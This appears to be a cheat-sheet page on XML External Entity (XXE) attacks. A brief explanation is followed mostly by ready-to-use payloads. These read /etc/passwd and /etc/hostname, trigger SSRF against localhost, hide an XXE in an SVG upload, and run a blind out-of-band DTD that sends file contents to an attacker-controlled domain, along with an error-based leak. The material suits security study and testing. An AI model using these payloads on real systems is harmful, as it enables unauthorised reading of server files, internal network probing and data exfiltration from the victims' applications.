XXE

Introduction

The XML External Entity (XXE) Processing attack is a type of attack that allows an attacker to interfere with an application's processing of XML data. This XML data contains a reference to an external entity (A system file or external URL) that is processed by the XML parser, leading to information disclosure, server-side request forgery and port scanning.

Proof of Concept

The following examples retrieve the file /etc/passwd from the victim system and show its content inside the "name" attribute.

<!-- EXAMPLE 1 -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY output SYSTEM "file:///etc/passwd" >]>
<comment>
  <name>&output;</name>
</comment>

<!-- EXAMPLE 2 -->
<?xml version="1.0" encoding="UTF-8"?>
<comment>
  <name><foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo></name>
</comment>

Furthermore, it can also be used to perform SSRF attacks:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
   <!ELEMENT data ANY >
   <!ENTITY output SYSTEM "https://localhost/" >]>
<comment>
  <name>&output;</name>
</comment>

Finally, if the application allows SVG images to be uploaded. So, since the SVG format uses XML, the image processing library might analyze the image, obtaining a new attack surface.

Once the image is shown to the client, it will contain the retrieved information.

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>

Blind XXE (Data out-of-band)

In a blind XXE attack, the attacker can not see the result of their injection and must rely on indirect methods to gather information or execute their payload.

To perform this attack, first, the attacker must host a malicious Document Type Definition (DTD) on their attacking machine and then invoke the malicious DTD from the DTD that is sent to the victim's website.

This is an example of retrieving the file /etc/password from the victim's website.

<!-- HOSTED MALICIOUS DTD (malicious.dtd) -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://<ATTACKER_DOMAIN>/?x=%file;'>">
%eval;
%exfiltrate;

<!-- SUBMITTED DTD -->
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM
"http://<ATTACKER_DOMAIN>/malicious.dtd"> %xxe;]>

Blind XXE (Error message)

Another alternative to retrieve data using an XXE vulnerability is by triggering an XML parsing error, only will work if the application shows the resulting error message within the response, where the error message will contain the sensitive data that you want to retrieve.

The payload would be:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

References